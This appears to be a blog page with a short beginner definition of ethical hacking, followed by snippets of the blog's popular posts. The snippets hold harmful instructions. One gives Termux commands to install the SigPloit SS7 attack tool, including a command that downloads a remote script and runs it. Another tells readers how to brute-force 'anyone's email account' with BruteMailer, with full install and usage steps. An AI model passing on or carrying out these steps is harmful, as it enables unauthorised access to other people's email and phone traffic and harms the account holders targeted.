Skip to main content

What is Ethical Hacking? (guide for beginners)

WHAT IS HACKING?

In basic terms, hacking is the process of gaining unauthorised access to data that’s held on a computer, system or network. 

Hackers, or those who practice hacking, will access systems in a way that the creator or holder did not intend. Although the typical intension of hacking and hackers is a negative one, it can actually be a beneficial process.

WHAT IS ETHICAL HACKING?

Ethical hacking is the process where a professional hacker legally and deliberately tries to break into the computers and devices of an organisation. In doing so, ethical hackers can test the organisation’s defences, highlighting any vulnerabilities in their systems and networks. 

it’s a sometimes complex and detailed process, with many different elements to consider. An ethical hacker, sometimes known as a white-hat hacker, will look for weaknesses in a variety of different ways. They will also perform a variety of other tasks linked to general cyber security. This can include: 

Assessing vulnerabilities
Penetration testing 
Gathering intelligence about entry points
Scanning infrastructures to spot weaknesses
 Accessing systems/networks and exploiting vulnerabilities 
Hiding their access and evading detection Compiling reports and analysis for the attempts.

   That's all for today,bookmark this site to read more of my ethical hacking guide posts,thanks for reading.

Comments

Post a Comment

Popular posts from this blog

Tool to perform SS7 attack using Termux

Open termux terminal and type in the following commands:  pkg install python pkg install python2 pkg install lksctp-tools pkg install tsu pkg install wget wget https://raw.githubusercontent.com/MasterDevX/java/master/installjava && bash installjava git clone https://github.com/SigPloiter/SigPloit cd SigPloit pip2 install -r requirements.txt python2 sigploit.py        Thanks for reading,hope you enjoyed the post

How to build a diy smartphone projector

Did you know you can build a smartphone projector at home at a low budget cost? well,you can,infact its actually simple,I will show you in this post how you can do it. Here's a step by step guide to a DIY projector. Materials: .A shoebox .Magnifying glass .Phone holder .Scissors or precision knife .Tape .Smartphone .Pencil .Black paint (You can easily get any of this items in your household but if you don't have, you can purchase them at an affordable price from Amazon )  Step 1: Cut the Box The first thing you’re going to do is to separate the part that will hold the lens. This is to make it easier to add the lens to the projector. To do this, cut out one of the short sides of the box. Save 50% on select product(s) with promo code 5055FBR5 on Amazon.com Step 2: Darken the inside of the box Now you need to darken the inside of the box,this stops the light from reflecting back into the image thus ensuring better quality.To do this,use the black pa...

Hack into anyone's email account using this tool

Need to hack or "gain access" to an email account? This post will show you a step by step guide on how to do that through a method know as bruteforce attack. To perform this attack,the tool that will be used is  BruteMailer ,a python3 script created by Solomon Adenuga that can perform this attack on different email services,it also has a password generator for you to generate strong passwords to bruteforce your target's email address. For mobile users,you can use this tool on termux INSTALLATION OF TERMUX Visit  F-droid and download the termux app INSTALLATION OF BRUTEMAILER ON TERMUX Open termux and input the following commands: apt update && apt upgrade pkg install git pkg install python3 pkg install pip git clone https://github.com/SoloTech01/BruteMailer.git cd BruteMailer pip install -r requirements.txt USING BRUTEMAILER ON TERMUX AFTER INSTALLATION  cd BruteMailer python3 brutemailer.py USAGE Select your target's email service,then enter their email addr...